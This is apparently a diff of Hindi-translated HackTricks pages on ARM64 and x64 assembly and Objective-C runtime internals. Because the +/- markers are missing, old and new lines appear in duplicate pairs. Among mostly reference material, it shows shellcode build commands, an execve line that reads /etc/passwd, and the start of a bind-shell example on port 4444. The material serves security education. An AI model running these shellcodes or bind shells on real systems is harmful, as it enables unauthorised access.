- ध्यान दें कि यह लिंक रजिस्टर को लौटने के पते से नहीं भरेगा (उपरोक्त उपरूटीन कॉल के लिए उपयुक्त नहीं है जिसे वापस लौटने की आवश्यकता है)।
- **`bl`**: **लिंक के साथ शाखा**, जिसका उपयोग एक **उपरूटीन** को **कॉल** करने के लिए किया जाता है। **लौटने का पता `x30` में संग्रहीत होता है**।
- उदाहरण: `bl myFunction` — यह फ़ंक्शन `myFunction` को कॉल करता है और लौटने का पता `x30` में संग्रहीत करता है।
- ध्यान दें कि यह लिंक रजिस्टर को लौटने के पते से नहीं भरेगा (उपरोक्त उपरूटीन कॉल के लिए उपयुक्त नहीं है जिसे वापस लौटने की आवश्यकता है)।
- **`blr`**: **लिंक के साथ शाखा रजिस्टर** में, जिसका उपयोग एक **उपरूटीन** को **कॉल** करने के लिए किया जाता है जहाँ लक्ष्य **एक रजिस्टर में निर्दिष्ट** होता है। लौटने का पता `x30` में संग्रहीत होता है। (यह है
- उदाहरण: `blr x1` — यह उस फ़ंक्शन को कॉल करता है जिसका पता `x1` में है और लौटने का पता `x30` में संग्रहीत करता है।
- **`ret`**: **उपरूटीन** से **लौटें**, आमतौर पर **`x30`** में पते का उपयोग करते हुए।
- उदाहरण: `ret` — यह वर्तमान उपरूटीन से लौटता है जो `x30` में लौटने के पते का उपयोग करता है।
- ध्यान दें कि यह लिंक रजिस्टर को लौटने के पते से नहीं भरेगा (उपप्रक्रिया कॉल के लिए उपयुक्त नहीं है जिसे वापस लौटने की आवश्यकता है)।
- **`bl`**: **लिंक के साथ शाखा**, जिसका उपयोग एक **उपप्रक्रिया** को **कॉल** करने के लिए किया जाता है। **रिटर्न पता `x30` में संग्रहीत होता है**।
- उदाहरण: `bl myFunction` — यह फ़ंक्शन `myFunction` को कॉल करता है और रिटर्न पता `x30` में संग्रहीत करता है।
- ध्यान दें कि यह लिंक रजिस्टर को लौटने के पते से नहीं भरेगा (उपप्रक्रिया कॉल के लिए उपयुक्त नहीं है जिसे वापस लौटने की आवश्यकता है)।
- **`blr`**: **लिंक के साथ शाखा रजिस्टर** के लिए, जिसका उपयोग एक **उपप्रक्रिया** को **कॉल** करने के लिए किया जाता है जहाँ लक्ष्य **एक रजिस्टर में निर्दिष्ट** होता है। रिटर्न पता `x30` में संग्रहीत होता है। (यह है
- उदाहरण: `blr x1` — यह उस फ़ंक्शन को कॉल करता है जिसका पता `x1` में है और रिटर्न पता `x30` में संग्रहीत होता है।
- **`ret`**: **उपप्रक्रिया** से **लौटें**, आमतौर पर **`x30`** में पते का उपयोग करते हुए।
- उदाहरण: `ret` — यह वर्तमान उपप्रक्रिया से लौटता है जो `x30` में लौटने के पते का उपयोग करता है।
- **`b.<cond>`**: शर्तीय शाखाएँ।
- **`b.eq`**: **बराबर होने पर शाखा**, पिछले `cmp` निर्देश के आधार पर।
- उदाहरण: `b.eq label` — यदि पिछले `cmp` निर्देश ने दो समान मान पाए, तो यह `label` पर कूदता है।
@ -198,7 +198,7 @@ ARM64 निर्देश आमतौर पर **फॉर्मेट `opco
- उदाहरण: `tbnz x0, #8, label`
- **`tbz`**: बिट का परीक्षण करें और शून्य पर शाखा करें।
- उदाहरण: `tbz x0, #8, label`
- **शर्तीय चयन संचालन**: ये संचालन हैं जिनका व्यवहार शर्तीय बिट्स के आधार पर भिन्न होता है।
- **शर्तीय चयन ऑपरेशन**: ये ऑपरेशन हैं जिनका व्यवहार शर्तीय बिट्स के आधार पर भिन्न होता है।
- `csel Xd, Xn, Xm, cond` -> `csel X0, X1, X2, EQ` -> यदि सत्य है, तो X0 = X1, यदि गलत है, तो X0 = X2
- `csinc Xd, Xn, Xm, cond` -> यदि सत्य है, तो Xd = Xn, यदि गलत है, तो Xd = Xm + 1
- `cinc Xd, Xn, cond` -> यदि सत्य है, तो Xd = Xn + 1, यदि गलत है, तो Xd = Xn
@ -212,7 +212,7 @@ ARM64 निर्देश आमतौर पर **फॉर्मेट `opco
- उदाहरण: `adrp x0, symbol` — यह `symbol` का पृष्ठ पता गणना करता है और इसे `x0` में संग्रहीत करता है।
- **`ldrsw`**: **मेमोरी** से एक साइन **32-बिट** मान लोड करें और इसे **64** बिट्स में **साइन-एक्सटेंड** करें।
- उदाहरण: `ldrsw x0, [x1]` — यह `x1` द्वारा इंगित मेमोरी स्थान से एक साइन 32-बिट मान लोड करता है, इसे 64 बिट्स में साइन-एक्सटेंड करता है, और इसे `x0` में संग्रहीत करता है।
- **`stur`**: **एक रजिस्टर मान को एक मेमोरी स्थान** में स्टोर करें, एक अन्य रजिस्टर से ऑफसेट का उपयोग करते हुए।
- **`stur`**: **एक रजिस्टर मान को एक मेमोरी स्थान** में संग्रहीत करें, एक अन्य रजिस्टर से ऑफसेट का उपयोग करते हुए।
- उदाहरण: `stur x0, [x1, #4]` — यह `x0` में मान को उस मेमोरी पते में संग्रहीत करता है जो `x1` में वर्तमान पते से 4 बाइट अधिक है।
- **`svc`** : एक **सिस्टम कॉल** करें। इसका अर्थ "सुपरवाइज़र कॉल" है। जब प्रोसेसर इस निर्देश को निष्पादित करता है, तो यह **उपयोगकर्ता मोड से कर्नेल मोड में स्विच करता है** और मेमोरी में एक विशिष्ट स्थान पर कूदता है जहाँ **कर्नेल का सिस्टम कॉल हैंडलिंग** कोड स्थित है।
@ -224,7 +224,7 @@ mov x0, 0 ; रजिस्टर x0 में निकासी स्थि
svc 0 ; सिस्टम कॉल करें।
```
### **फंक्शन प्रस्तावना**
### **फंक्शन प्रस्तावना**
1. **लिंक रजिस्टर और फ्रेम पॉइंटर को स्टैक में सहेजें**:
```armasm
@ -235,7 +235,7 @@ stp x29, x30, [sp, #-16]! ; store pair x29 and x30 to the stack and decrement t
### **फ़ंक्शन एपिलॉग**
1. **स्थानीय चर को डिआलोकेट करें (यदि कोई आवंटित किया गया था)**: `add sp, sp, <size>`
1. **स्थानीय चर को डिआलॉकेट करें (यदि कोई आवंटित किया गया हो)**: `add sp, sp, <size>`
2. **लिंक रजिस्टर और फ्रेम पॉइंटर को पुनर्स्थापित करें**:
```armasm
ldp x29, x30, [sp], #16 ; load pair x29 and x30 from the stack and increment the stack pointer
@ -245,8 +245,8 @@ ldp x29, x30, [sp], #16 ; load pair x29 and x30 from the stack and increment th
## AARCH32 निष्पादन स्थिति
Armv8-A 32-बिट प्रोग्रामों के निष्पादन का समर्थन करता है। **AArch32** **`A32`** और **`T32`** के **दो निर्देश सेटों** में से एक में चल सकता है और **`interworking`** के माध्यम से उनके बीच स्विच कर सकता है।\
**Privileged** 64-बिट प्रोग्राम 32-बिट प्रोग्रामों के **निष्पादन** को निम्नलिखित विशेषाधिकार स्तर 32-बिट में अपवाद स्तर स्थानांतरण को निष्पादित करके शेड्यूल कर सकते हैं।\
ध्यान दें कि 64-बिट से 32-बिट में संक्रमण अपवाद स्तर के निम्न स्तर के साथ होता है (उदाहरण के लिए, EL1 में 64-बिट प्रोग्राम EL0 में प्रोग्राम को ट्रिगर करता है)। यह तब किया जाता है जब `AArch32` प्रक्रिया थ्रेड निष्पादित होने के लिए तैयार होती है और **`SPSR_ELx`** विशेष रजिस्टर के **बिट 4 को 1** पर सेट किया जाता है और `SPSR_ELx` का शेष भाग **`AArch32`** प्रोग्रामों का CPSR संग्रहीत करता है। फिर, विशेषाधिकार प्राप्त प्रक्रिया **`ERET`** निर्देश को कॉल करती है ताकि प्रोसेसर **`AArch32`** में संक्रमण कर सके, जो CPSR के आधार पर A32 या T32 में प्रवेश करता है।\*\*
**Privileged** 64-बिट प्रोग्राम 32-बिट प्रोग्रामों के **निष्पादन** को निम्नलिखित विशेषाधिकार 32-बिट में अपवाद स्तर स्थानांतरण को निष्पादित करके शेड्यूल कर सकते हैं।\
ध्यान दें कि 64-बिट से 32-बिट में संक्रमण अपवाद स्तर के निम्न स्तर के साथ होता है (उदाहरण के लिए, EL1 में 64-बिट प्रोग्राम EL0 में प्रोग्राम को ट्रिगर करता है)। यह तब किया जाता है जब `AArch32` प्रक्रिया थ्रेड निष्पादित होने के लिए तैयार होती है और **`SPSR_ELx`** विशेष रजिस्टर के **बिट 4 को 1** पर सेट किया जाता है और `SPSR_ELx` का शेष भाग **`AArch32`** प्रोग्रामों का CPSR संग्रहीत करता है। फिर, विशेषाधिकार प्राप्त प्रक्रिया **`ERET`** निर्देश को कॉल करती है ताकि प्रोसेसर **`AArch32`** में संक्रमण कर सके, A32 या T32 में प्रवेश करते हुए CPSR\*\* के आधार पर।\*\*
**`interworking`** CPSR के J और T बिट्स का उपयोग करके होता है। `J=0` और `T=0` का अर्थ है **`A32`** और `J=0` और `T=1` का अर्थ है **T32**। यह मूल रूप से सबसे निचले बिट को 1 पर सेट करने का संकेत देता है कि निर्देश सेट T32 है।\
यह **interworking शाखा निर्देशों** के दौरान सेट किया जाता है, लेकिन जब PC को गंतव्य रजिस्टर के रूप में सेट किया जाता है तो इसे अन्य निर्देशों के साथ सीधे भी सेट किया जा सकता है। उदाहरण:
@ -272,7 +272,7 @@ mov r0, #8
- **`r13`**: स्टैक पॉइंटर
- **`r14`**: लिंक रजिस्टर
इसके अलावा, रजिस्टर **`बैंक्ड रजिस्ट्रियों`** में बैकअप होते हैं। ये ऐसे स्थान हैं जो रजिस्टर के मानों को संग्रहीत करते हैं जिससे **तेज़ संदर्भ स्विचिंग** को सक्षम किया जा सके, अपवाद प्रबंधन और विशेषाधिकार प्राप्त संचालन में, हर बार रजिस्टर को मैन्युअल रूप से सहेजने और पुनर्स्थापित करने की आवश्यकता से बचने के लिए।\
इसके अलावा, रजिस्टर **`बैंक्ड रजिस्ट्रियों`** में बैकअप होते हैं। ये ऐसे स्थान हैं जो रजिस्टर के मानों को संग्रहीत करते हैं जिससे **तेज़ संदर्भ स्विचिंग** को सक्षम किया जा सके, अपवाद प्रबंधन और विशेषाधिकार प्राप्त ऑपरेशनों में, हर बार मैन्युअल रूप से रजिस्टर को सहेजने और पुनर्स्थापित करने की आवश्यकता से बचने के लिए।\
यह **`CPSR`** से प्रोसेसर मोड के **`SPSR`** में प्रोसेसर की स्थिति को सहेजकर किया जाता है, जिस पर अपवाद लिया जाता है। अपवाद लौटने पर, **`CPSR`** को **`SPSR`** से पुनर्स्थापित किया जाता है।
### CPSR - वर्तमान प्रोग्राम स्थिति रजिस्टर
@ -289,8 +289,8 @@ AArch32 में CPSR AArch64 में **`PSTATE`** के समान का
#### एप्लिकेशन प्रोग्राम स्थिति रजिस्टर (APSR)
- **`N`**, **`Z`**, **`C`**, **`V`** ध्वज (AArch64 की तरह ही)
- **`Q`** ध्वज: इसे 1 पर सेट किया जाता है जब भी **पूर्णांक संतृप्ति होती है** विशेष संतृप्ति अंकगणितीय निर्देश के निष्पादन के दौरान। एक बार इसे **`1`** पर सेट करने के बाद, यह मान बनाए रखेगा जब तक इसे मैन्युअल रूप से 0 पर सेट नहीं किया जाता। इसके अलावा, इसका मान अप्रत्यक्ष रूप से जांचने के लिए कोई निर्देश नहीं है, इसे मैन्युअल रूप से पढ़कर करना होगा।
- **`GE`** (बड़ा या समान) ध्वज: इसका उपयोग SIMD (सिंगल इंस्ट्रक्शन, मल्टीपल डेटा) संचालन में किया जाता है, जैसे "समानांतर जोड़" और "समानांतर घटाना"। ये संचालन एक ही निर्देश में कई डेटा बिंदुओं को संसाधित करने की अनुमति देते हैं।
- **`Q`** ध्वज: इसे 1 पर सेट किया जाता है जब भी **पूर्णांक संतृप्ति होती है** विशेष संतृप्ति अंकगणितीय निर्देश के निष्पादन के दौरान। एक बार इसे **`1`** पर सेट करने के बाद, यह मान बनाए रखेगा जब तक इसे मैन्युअल रूप से 0 पर सेट नहीं किया जाता। इसके अलावा, कोई ऐसा निर्देश नहीं है जो इसके मान की जांच करता है, इसे मैन्युअल रूप से पढ़कर करना होगा।
- **`GE`** (बड़ा या समान) ध्वज: इसका उपयोग SIMD (सिंगल इंस्ट्रक्शन, मल्टीपल डेटा) ऑपरेशनों में किया जाता है, जैसे "समानांतर जोड़" और "समानांतर घटाना"। ये ऑपरेशन एक ही निर्देश में कई डेटा बिंदुओं को संसाधित करने की अनुमति देते हैं।
उदाहरण के लिए, **`UADD8`** निर्देश **चार जोड़े बाइट्स** (दो 32-बिट ऑपरेन्ड से) को समानांतर में जोड़ता है और परिणामों को 32-बिट रजिस्टर में संग्रहीत करता है। फिर यह **`APSR`** में इन परिणामों के आधार पर **`GE`** ध्वज सेट करता है। प्रत्येक GE ध्वज एक बाइट जोड़ के लिए संबंधित होता है, यह दर्शाते हुए कि उस बाइट जोड़े के लिए जोड़ **ओवरफ्लो** हुआ या नहीं।
@ -301,7 +301,7 @@ AArch32 में CPSR AArch64 में **`PSTATE`** के समान का
- **`J`** और **`T`** बिट्स: **`J`** 0 होना चाहिए और यदि **`T`** 0 है तो A32 निर्देश सेट का उपयोग किया जाता है, और यदि यह 1 है, तो T32 का उपयोग किया जाता है।
- **IT ब्लॉक स्थिति रजिस्टर** (`ITSTATE`): ये 10-15 और 25-26 से बिट्स हैं। ये **`IT`** प्रीफिक्स समूह के भीतर निर्देशों के लिए शर्तें संग्रहीत करते हैं।
- **`E`** बिट: **एंडियननेस** को दर्शाता है।
- **मोड और अपवाद मास्क बिट्स** (0-4): ये वर्तमान निष्पादन स्थिति को निर्धारित करते हैं। **5वां** यह दर्शाता है कि प्रोग्राम 32-बिट (1) के रूप में चल रहा है या 64-बिट (0) के रूप में। अन्य 4 वर्तमान में उपयोग किए जा रहे **अपवाद मोड** का प्रतिनिधित्व करते हैं (जब कोई अपवाद होता है और इसे संभाला जा रहा है)। सेट किया गया संख्या **इसकी प्राथमिकता** को दर्शाता है यदि इस समय एक और अपवाद उत्पन्न होता है।
- **मोड और अपवाद मास्क बिट्स** (0-4): ये वर्तमान निष्पादन स्थिति को निर्धारित करते हैं। **5वां** यह दर्शाता है कि प्रोग्राम 32-बिट (1) या 64-बिट (0) के रूप में चल रहा है। अन्य 4 वर्तमान में उपयोग किए जा रहे **अपवाद मोड** का प्रतिनिधित्व करते हैं (जब कोई अपवाद होता है और इसे संभाला जा रहा है)। सेट किया गया संख्या **इसकी प्राथमिकता** को दर्शाता है यदि इस समय एक और अपवाद उत्पन्न होता है जबकि इसे संभाला जा रहा है।
<figure><img src="../../../images/image (1200).png" alt=""><figcaption></figcaption></figure>
@ -336,19 +336,19 @@ XNU एक और प्रकार के कॉल का समर्थन
### comm पृष्ठ
यह एक कर्नेल मालिक मेमोरी पृष्ठ है जो हर उपयोगकर्ता प्रक्रिया के पते के स्केप में मैप किया गया है। इसका उद्देश्य उपयोगकर्ता मोड से कर्नेल स्पेस में संक्रमण को तेज करना है, बजाय इसके कि कर्नेल सेवाओं के लिए सिस्टम कॉल का उपयोग किया जाए, जो इतना अधिक उपयोग किया जाता है कि यह संक्रमण बहुत अप्रभावी होगा
यह एक कर्नेल मालिक मेमोरी पृष्ठ है जो हर उपयोगकर्ता प्रक्रिया के पते के स्केप में मैप किया गया है। इसका उद्देश्य उपयोगकर्ता मोड से कर्नेल स्पेस में संक्रमण को तेज करना है, ताकि कर्नेल सेवाओं के लिए सिस्टम कॉल का उपयोग करने की तुलना में यह संक्रमण बहुत अप्रभावी हो।
उदाहरण के लिए, कॉल `gettimeofdate` सीधे comm पृष्ठ से `timeval` का मान पढ़ता है।
### objc_msgSend
यह फ़ंक्शन Objective-C या Swift प्रोग्रामों में उपयोग किया जाना बहुत सामान्य है। यह फ़ंक्शन एक Objective-C ऑब्जेक्ट के एक मेथड को कॉल करने की अनुमति देता है।
यह फ़ंक्शन Objective-C या Swift प्रोग्रामों में उपयोग में लाना बहुत सामान्य है। यह फ़ंक्शन एक Objective-C ऑब्जेक्ट के एक मेथड को कॉल करने की अनुमति देता है।
पैरामीटर ([दस्तावेज़ में अधिक जानकारी](https://developer.apple.com/documentation/objectivec/1456712-objc_msgsend)):
- x0: self -> इंस्टेंस का पॉइंटर
- x1: op -> मेथड का सेलेक्टर
- x2... -> कॉल किए गए मेथड के बाकी तर्क
- x0: self -> उदाहरण का पॉइंटर
- x1: op -> मेथड का चयनकर्ता
- x2... -> कॉल किए गए मेथड के शेष तर्क
तो, यदि आप इस फ़ंक्शन की शाखा से पहले ब्रेकपॉइंट लगाते हैं, तो आप आसानी से lldb में देख सकते हैं कि क्या कॉल किया जा रहा है (इस उदाहरण में ऑब्जेक्ट `NSConcreteTask` से एक ऑब्जेक्ट को कॉल करता है जो एक कमांड चलाएगा):
```bash
@ -373,14 +373,14 @@ whoami
>
> इसके अलावा, **`OBJC_HELP=1`** सेट करने और किसी भी बाइनरी को कॉल करने पर आप अन्य वातावरण वेरिएबल देख सकते हैं जिन्हें आप **log** करने के लिए उपयोग कर सकते हैं जब कुछ Objc-C क्रियाएँ होती हैं।
जब यह फ़ंक्शन कॉल किया जाता है, तो निर्दिष्ट उदाहरण के कॉल किए गए मेथड को ढूंढना आवश्यक है, इसके लिए विभिन्न खोजें की जाती हैं:
जब यह फ़ंक्शन कॉल किया जाता है, तो निर्दिष्ट उदाहरण के कॉल किए गए तरीके को ढूंढना आवश्यक है, इसके लिए विभिन्न खोजें की जाती हैं:
- आशावादी कैश लुकअप करें:
- यदि सफल, तो समाप्त
- runtimeLock (पढ़ें) प्राप्त करें
- यदि (realize && !cls->realized) क्लास को realize करें
- यदि (initialize && !cls->initialized) क्लास को initialize करें
- क्लास के अपने कैश को आजमाएं:
- क्लास की अपनी कैश को आजमाएं:
- यदि सफल, तो समाप्त
- क्लास मेथड सूची को आजमाएं:
- यदि पाया गया, तो कैश भरें और समाप्त
@ -388,12 +388,12 @@ whoami
- यदि सफल, तो समाप्त
- सुपरक्लास मेथड सूची को आजमाएं:
- यदि पाया गया, तो कैश भरें और समाप्त
- यदि (resolver) मेथड resolver को आजमाएं, और क्लास लुकअप से दोहराएं
- यदि (resolver) मेथड रिसॉल्वर को आजमाएं, और क्लास लुकअप से दोहराएं
- यदि अभी भी यहाँ हैं (= सभी अन्य विफल हो गए हैं) तो फॉरवर्डर को आजमाएं
### Shellcodes
To compile:
संकलन करने के लिए:
```bash
as -o shell.o shell.s
ld -o shell shell.o -macosx_version_min 13.0 -lSystem -L /Library/Developer/CommandLineTools/SDKs/MacOSX.sdk/usr/lib
@ -518,7 +518,7 @@ svc #0x1337 ; Make the syscall. The number 0x1337 doesn't actually matter,
```
{{#endtab}}
{{#tab name="लिनक्स के लिए adr के साथ"}}
{{#tab name="with adr for linux"}}
```armasm
; From https://8ksec.io/arm64-reversing-and-exploitation-part-5-writing-shellcode-8ksec-blogs/
.section __TEXT,__text ; This directive tells the assembler to place the following code in the __text section of the __TEXT segment.

12
src/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/introduction-to-x64.md
View File

@ -8,7 +8,7 @@ x64, जिसे x86-64 के नाम से भी जाना जात
### **रजिस्टर**
x64 x86 आर्किटेक्चर का विस्तार करता है, जिसमें **16 सामान्य प्रयोजन रजिस्टर** होते हैं जिन्हें `rax`, `rbx`, `rcx`, `rdx`, `rbp`, `rsp`, `rsi`, `rdi`, और `r8` से `r15` तक लेबल किया गया है। इनमें से प्रत्येक **64-बिट** (8-बाइट) मान को स्टोर कर सकता है। इन रजिस्टरों में 32-बिट, 16-बिट, और 8-बिट उप-रजिस्टर भी होते हैं जो संगतता और विशिष्ट कार्यों के लिए होते हैं।
x64 x86 आर्किटेक्चर का विस्तार करता है, जिसमें **16 सामान्य-उद्देश्य रजिस्टर** होते हैं जिन्हें `rax`, `rbx`, `rcx`, `rdx`, `rbp`, `rsp`, `rsi`, `rdi`, और `r8` से `r15` तक लेबल किया गया है। इनमें से प्रत्येक **64-बिट** (8-बाइट) मान को स्टोर कर सकता है। इन रजिस्टरों में 32-बिट, 16-बिट, और 8-बिट उप-रजिस्टर भी होते हैं जो संगतता और विशिष्ट कार्यों के लिए होते हैं।
1. **`rax`** - पारंपरिक रूप से **फंक्शंस** से **रिटर्न वैल्यू** के लिए उपयोग किया जाता है।
2. **`rbx`** - अक्सर मेमोरी ऑपरेशंस के लिए **बेस रजिस्टर** के रूप में उपयोग किया जाता है।
@ -17,7 +17,7 @@ x64 x86 आर्किटेक्चर का विस्तार करत
5. **`rbp`** - स्टैक फ्रेम के लिए **बेस पॉइंटर**
6. **`rsp`** - **स्टैक पॉइंटर**, जो स्टैक के शीर्ष को ट्रैक करता है।
7. **`rsi`** और **`rdi`** - स्ट्रिंग/मेमोरी ऑपरेशंस में **स्रोत** और **गंतव्य** इंडेक्स के लिए उपयोग किया जाता है।
8. **`r8`** से **`r15`** - x64 में पेश किए गए अतिरिक्त सामान्य प्रयोजन रजिस्टर।
8. **`r8`** से **`r15`** - x64 में पेश किए गए अतिरिक्त सामान्य-उद्देश्य रजिस्टर।
### **कॉलिंग कन्वेंशन**
@ -30,7 +30,7 @@ x64 कॉलिंग कन्वेंशन ऑपरेटिंग सि
### Swift में कॉलिंग कन्वेंशन
Swift का अपना **कॉलिंग कन्वेंशन** है जिसे [**https://github.com/apple/swift/blob/main/docs/ABI/CallConvSummary.rst#x86-64**](https://github.com/apple/swift/blob/main/docs/ABI/CallConvSummary.rst#x86-64) पर पाया जा सकता है।
Swift का अपना **कॉलिंग कन्वेंशन** है जिसे [**https://github.com/apple/swift/blob/main/docs/ABI/CallConvSummary.rst#x86-64**](https://github.com/apple/swift/blob/main/docs/ABI/CallConvSummary.rst#x86-64) में पाया जा सकता है।
### **सामान्य निर्देश**
@ -95,7 +95,7 @@ syscalls की विभिन्न श्रेणियाँ हैं, आ
12 AUE_CHDIR ALL { int chdir(user_addr_t path); }
[...]
```
तो `open` syscall (**5**) को **Unix/BSD वर्ग** से कॉल करने के लिए आपको इसे जोड़ना होगा: `0x2000000`
इसलिए `open` syscall (**5**) को **Unix/BSD वर्ग** से कॉल करने के लिए आपको इसे जोड़ना होगा: `0x2000000`
तो, open को कॉल करने के लिए syscall संख्या होगी `0x2000005`
@ -209,7 +209,7 @@ syscall
#### कैट के साथ पढ़ें
लक्ष्य `execve("/bin/cat", ["/bin/cat", "/etc/passwd"], NULL)` को निष्पादित करना है, इसलिए दूसरा तर्क (x1) पैरामीटर का एक ऐरे है (जो मेमोरी में इनका मतलब पतों का एक स्टैक है)।
लक्ष्य है `execve("/bin/cat", ["/bin/cat", "/etc/passwd"], NULL)` को निष्पादित करना, इसलिए दूसरा तर्क (x1) पैरामीटर का एक ऐरे है (जो मेमोरी में इनका मतलब पतों का एक स्टैक है)।
```armasm
bits 64
section .text
@ -280,7 +280,7 @@ touch_command: db "touch /tmp/lalala", 0
```
#### Bind shell
**पोर्ट 4444** में [https://packetstormsecurity.com/files/151731/macOS-TCP-4444-Bind-Shell-Null-Free-Shellcode.html](https://packetstormsecurity.com/files/151731/macOS-TCP-4444-Bind-Shell-Null-Free-Shellcode.html) से Bind shell
Bind shell from [https://packetstormsecurity.com/files/151731/macOS-TCP-4444-Bind-Shell-Null-Free-Shellcode.html](https://packetstormsecurity.com/files/151731/macOS-TCP-4444-Bind-Shell-Null-Free-Shellcode.html) in **port 4444**
```armasm
section .text
global _main

28
src/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/objects-in-memory.md
View File

@ -67,14 +67,14 @@ ObjectiveC रनटाइम द्वारा उपयोग किए ज
- **`__objc_protorefs`** (`protocol_t *`): प्रोटोकॉल संदर्भ
- **`__objc_selrefs`** (`SEL`): चयनकर्ता संदर्भ
- **`__objc_const`** (`...`): वर्ग `r/o` डेटा और अन्य (उम्मीद है) स्थिर डेटा
- **`__objc_imageinfo`** (`version, flags`): छवि लोड के दौरान उपयोग किया जाता है: वर्तमान संस्करण `0`; ध्वज पूर्व-ऑप्टिमाइज्ड GC समर्थन आदि निर्दिष्ट करते हैं।
- **`__objc_imageinfo`** (`version, flags`): छवि लोड के दौरान उपयोग किया जाता है: वर्तमान संस्करण `0`; फ्लैग पूर्व-ऑप्टिमाइज्ड GC समर्थन आदि निर्दिष्ट करते हैं।
- **`__objc_protolist`** (`protocol_t *`): प्रोटोकॉल सूची
- **`__objc_nlcatlist`** (`category_t`): इस बाइनरी में परिभाषित नॉन-लेज़ी श्रेणियों के लिए पॉइंटर
- **`__objc_catlist`** (`category_t`): इस बाइनरी में परिभाषित श्रेणियों के लिए पॉइंटर
- **`__objc_nlclslist`** (`classref_t`): इस बाइनरी में परिभाषित नॉन-लेज़ी ऑब्जेक्टिव-सी कक्षाओं के लिए पॉइंटर
- **`__objc_classlist`** (`classref_t`): इस बाइनरी में परिभाषित सभी ऑब्जेक्टिव-सी कक्षाओं के लिए पॉइंटर
- **`__objc_nlclslist`** (`classref_t`): इस बाइनरी में परिभाषित नॉन-लेज़ी ऑब्जेक्टिव-सी वर्गों के लिए पॉइंटर
- **`__objc_classlist`** (`classref_t`): इस बाइनरी में परिभाषित सभी ऑब्जेक्टिव-सी वर्गों के लिए पॉइंटर
यह कुछ सेक्शन का उपयोग करता है **`__TEXT`** खंड में स्थिर मानों को संग्रहीत करने के लिए यदि इस खंड में लिखना संभव नहीं है:
यह **`__TEXT`** खंड में कुछ सेक्शन का भी उपयोग करता है ताकि स्थायी मानों को संग्रहीत किया जा सके यदि इस खंड में लिखना संभव नहीं है:
- **`__objc_methname`** (C-String): विधि नाम
- **`__objc_classname`** (C-String): वर्ग नाम
@ -86,7 +86,7 @@ Objective-c चयनकर्ता और सरल और जटिल प्
- प्राइमिटिव प्रकार अपने प्रकार के पहले अक्षर का उपयोग करते हैं `i` के लिए `int`, `c` के लिए `char`, `l` के लिए `long`... और यदि यह unsigned है तो बड़े अक्षर का उपयोग करते हैं (`L` के लिए `unsigned Long`)।
- अन्य डेटा प्रकार जिनके अक्षर उपयोग किए जाते हैं या विशेष होते हैं, अन्य अक्षरों या प्रतीकों का उपयोग करते हैं जैसे `q` के लिए `long long`, `b` के लिए `bitfields`, `B` के लिए `booleans`, `#` के लिए `classes`, `@` के लिए `id`, `*` के लिए `char pointers`, `^` के लिए सामान्य `pointers` और `?` के लिए `undefined`
- रे, संरचनाएँ और संघ `[`, `{` और `(` का उपयोग करते हैं।
- रे, संरचनाएँ और संघ `[`, `{` और `(` का उपयोग करते हैं।
#### Example Method Declaration
```objectivec
@ -105,18 +105,18 @@ Objective-c चयनकर्ता और सरल और जटिल प्
```
#### विस्तृत विश्लेषण
1. **रिटर्न प्रकार (`NSString *`)**: `@` के रूप में एन्कोडेड, लंबाई 24
2. **`self` (ऑब्जेक्ट उदाहरण)**: `@` के रूप में एन्कोडेड, ऑफसेट 0 पर
3. **`_cmd` (सेलेक्टर)**: `:` के रूप में एन्कोडेड, ऑफसेट 8 पर
4. **पहला तर्क (`char * input`)**: `*` के रूप में एन्कोडेड, ऑफसेट 16 पर
5. **दूसरा तर्क (`NSDictionary * options`)**: `@` के रूप में एन्कोडेड, ऑफसेट 20 पर
6. **तीसरा तर्क (`NSError ** error`)**: `^@` के रूप में एन्कोडेड, ऑफसेट 24 पर
1. **वापसी प्रकार (`NSString *`)**: `@` के रूप में एन्कोड किया गया, लंबाई 24
2. **`self` (ऑब्जेक्ट उदाहरण)**: `@` के रूप में एन्कोड किया गया, ऑफसेट 0 पर
3. **`_cmd` (सेलेक्टर)**: `:` के रूप में एन्कोड किया गया, ऑफसेट 8 पर
4. **पहला तर्क (`char * input`)**: `*` के रूप में एन्कोड किया गया, ऑफसेट 16 पर
5. **दूसरा तर्क (`NSDictionary * options`)**: `@` के रूप में एन्कोड किया गया, ऑफसेट 20 पर
6. **तीसरा तर्क (`NSError ** error`)**: `^@` के रूप में एन्कोड किया गया, ऑफसेट 24 पर
**सेलेक्टर + एन्कोडिंग के साथ आप विधि को पुनर्निर्माण कर सकते हैं।**
### **क्लासेस**
Objective-C में क्लास एक संरचना है जिसमें प्रॉपर्टीज, मेथड पॉइंटर्स... होते हैं। यह संभव है कि आप संरचना `objc_class` को [**स्रोत कोड**](https://opensource.apple.com/source/objc4/objc4-756.2/runtime/objc-runtime-new.h.auto.html) में खोजें:
Objective-C में क्लास एक संरचना है जिसमें प्रॉपर्टीज, मेथड पॉइंटर्स... होते हैं। आप [**स्रोत कोड**](https://opensource.apple.com/source/objc4/objc4-756.2/runtime/objc-runtime-new.h.auto.html) में संरचना `objc_class` को ढूंढना संभव है:
```objectivec
struct objc_class : objc_object {
// Class ISA;
@ -137,9 +137,9 @@ data()->setFlags(set);
}
[...]
```
यह क्लास isa फ़ील्ड के कुछ बिट्स का उपयोग करके क्लास के बारे में कुछ जानकारी इंगित करता है।
यह क्लास isa फ़ील्ड के कुछ बिट्स का उपयोग क्लास के बारे में कुछ जानकारी इंगित करने के लिए करता है।
फिर, स्ट्रक्चर में `class_ro_t` स्ट्रक्चर का एक पॉइंटर होता है जो डिस्क पर स्टोर किया गया है, जिसमें क्लास के गुण जैसे इसका नाम, बेस मेथड्स, प्रॉपर्टीज और इंस्टेंस वेरिएबल्स होते हैं।\
रनटाइम के दौरान, एक अतिरिक्त स्ट्रक्चर `class_rw_t` का उपयोग किया जाता है जिसमें पॉइंटर्स होते हैं जिन्हें बदला जा सकता है जैसे मेथड्स, प्रोटोकॉल्स, प्रॉपर्टीज...
रनटाइम के दौरान एक अतिरिक्त स्ट्रक्चर `class_rw_t` का उपयोग किया जाता है जिसमें पॉइंटर्स होते हैं जिन्हें बदला जा सकता है जैसे मेथड्स, प्रोटोकॉल्स, प्रॉपर्टीज...
{{#include ../../../banners/hacktricks-training.md}}

34
src/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/README.md
View File

@ -17,15 +17,15 @@
- **/Users**: उपयोगकर्ताओं के लिए होम निर्देशिका।
- **/usr**: कॉन्फ़िग और सिस्टम बाइनरी
- **/var**: लॉग फ़ाइलें
